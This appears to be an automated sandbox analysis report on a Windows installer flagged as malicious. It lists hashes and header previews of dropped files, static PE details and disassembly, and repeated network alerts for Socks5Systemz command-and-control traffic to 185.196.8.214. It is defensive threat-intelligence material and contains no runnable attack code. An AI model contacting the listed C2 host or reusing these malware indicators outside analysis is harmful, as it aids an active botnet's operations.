                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):13312
                                                            Entropy (8bit):5.745960477552938
                                                            Encrypted:false
                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):6144
                                                            Entropy (8bit):4.289297026665552
                                                            Encrypted:false
                                                            SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                            MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                            SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                            SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                            SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23312
                                                            Entropy (8bit):4.596242908851566
                                                            Encrypted:false
                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.997770334607748
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 98.73%
                                                            • Inno Setup installer (109748/4) 1.08%
                                                            • Windows Screen Saver (13104/52) 0.13%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            File name:file.exe
                                                            File size:3'488'773 bytes
                                                            MD5:984c885de9fea28a60a25b278f424f50
                                                            SHA1:5971c05829104cb0dd47de9fb8806762c141f081
                                                            SHA256:5fe11452c901b9eb15809a33ecc6bb94c9d1ec87553708eac94ad19969cbaa8c
                                                            SHA512:8a2df01a795ede330f7d05b97e79ca48bff366c2ea9d3dbc27dbda9d6435e5cf4208019f97f104a23138c5681a173245557daf8749697263e6966d98213db18b
                                                            SSDEEP:49152:C9e8wILoaKF9q/1t2GpCKqsA15dXEGGgXH9AJ1ukBb1DGdg1TK2l7fghCy:M5w17ou5GgXH9AXz1e2BIky
                                                            TLSH:80F5332026444F31E0B397BA2F19E62562273ED622B86822F7D4663DCF3F5598433776
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                            Icon Hash:2d2e3797b32b2b99
                                                            Entrypoint:0x40a5f8
                                                            Entrypoint Section:CODE
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:1
                                                            OS Version Minor:0
                                                            File Version Major:1
                                                            File Version Minor:0
                                                            Subsystem Version Major:1
                                                            Subsystem Version Minor:0
                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFC4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            xor eax, eax
                                                            mov dword ptr [ebp-10h], eax
                                                            mov dword ptr [ebp-24h], eax
                                                            call 00007F749083F333h
                                                            call 00007F749084053Ah
                                                            call 00007F74908407C9h
                                                            call 00007F749084086Ch
                                                            call 00007F749084280Bh
                                                            call 00007F7490845176h
                                                            call 00007F74908452DDh
                                                            xor eax, eax
                                                            push ebp
                                                            push 0040ACC9h
                                                            push dword ptr fs:[eax]
                                                            mov dword ptr fs:[eax], esp
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040AC92h
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            mov eax, dword ptr [0040C014h]
                                                            call 00007F7490845D8Bh
                                                            call 00007F7490845976h
                                                            cmp byte ptr [0040B234h], 00000000h
                                                            je 00007F749084686Eh
                                                            call 00007F7490845E88h
                                                            xor eax, eax
                                                            call 00007F7490840029h
                                                            lea edx, dword ptr [ebp-10h]
                                                            xor eax, eax
                                                            call 00007F7490842E1Bh
                                                            mov edx, dword ptr [ebp-10h]
                                                            mov eax, 0040CE28h
                                                            call 00007F749083F3CAh
                                                            push 00000002h
                                                            push 00000000h
                                                            push 00000001h
                                                            mov ecx, dword ptr [0040CE28h]
                                                            mov dl, 01h
                                                            mov eax, 0040738Ch
                                                            call 00007F74908436AAh
                                                            mov dword ptr [0040CE2Ch], eax
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040AC4Ah
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            call 00007F7490845DE6h
                                                            mov dword ptr [0040CE34h], eax
                                                            mov eax, dword ptr [0040CE34h]
                                                            cmp dword ptr [eax+0Ch], 00000000h
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            CODE | 0x1000 | 0x9d30 | 0x9e00 | c3bd95c4b1a8e5199981e0d9b45fd18c | False | 0.6052709651898734 | data | 6.631765876950794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            DATA | 0xb000 | 0x250 | 0x400 | 1ee71d84f1c77af85f1f5c278f880572 | False | 0.306640625 | data | 2.751820662285145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            BSS | 0xc000 | 0xe8c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .reloc | 0x10000 | 0x8c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x11000 | 0x2c00 | 0x2c00 | c7a535967b01f9cfbd01353f9d5b9d89 | False | 0.32563920454545453 | data | 4.49363155636498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.2618296529968454
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-11T21:05:56.592753+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49694 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:56.945730+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49694 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:57.759019+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49695 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:58.587230+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49696 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:59.436703+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:05:59.808909+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:00.173237+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49698 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:04.025367+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49699 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:04.856670+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49700 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:05.212808+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49700 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:06.172922+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49701 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:07.015813+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49705 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:07.862918+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49706 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:08.685168+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49708 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:09.037740+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49708 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:09.851395+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49710 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:11.069617+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49711 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:11.896319+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49712 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:12.773663+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49713 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:13.605918+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49714 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:14.458614+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49715 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:15.308093+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49716 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:15.657816+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49716 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:16.511272+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:16.890327+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:17.260660+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:18.082965+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49718 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:18.905971+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49719 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:19.748752+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49720 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:20.096601+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49720 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:20.936229+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49721 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:21.296599+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49721 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:22.198017+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49722 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:22.998760+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:23.356736+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:23.709679+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:24.545349+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:24.913525+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49724 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:25.760563+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:26.218181+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:26.568628+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:27.422938+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:27.778832+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:28.137634+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:28.493940+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:29.319896+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49727 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:30.164158+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49728 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:31.118017+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49729 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:31.961080+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49730 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:33.084848+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49731 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:33.902633+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49732 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:34.288980+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49732 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:35.098906+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49733 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:35.918371+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49734 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:36.274434+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49734 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.246858+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.594424+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:37.940100+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:38.788211+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49736 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:39.632773+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49737 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:40.485386+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:40.839571+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:41.199616+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:41.796373+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:42.152596+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:42.687249+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:43.040861+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:43.864891+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49739 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:44.711438+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49740 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:45.545838+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49741 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:45.897834+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49741 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:46.723627+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49742 | 185.196.8.214 | 80 | TCP
2024-09-11T21:06:47.539506+0200 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49743 | 185.196.8.214 | 80 | TCP
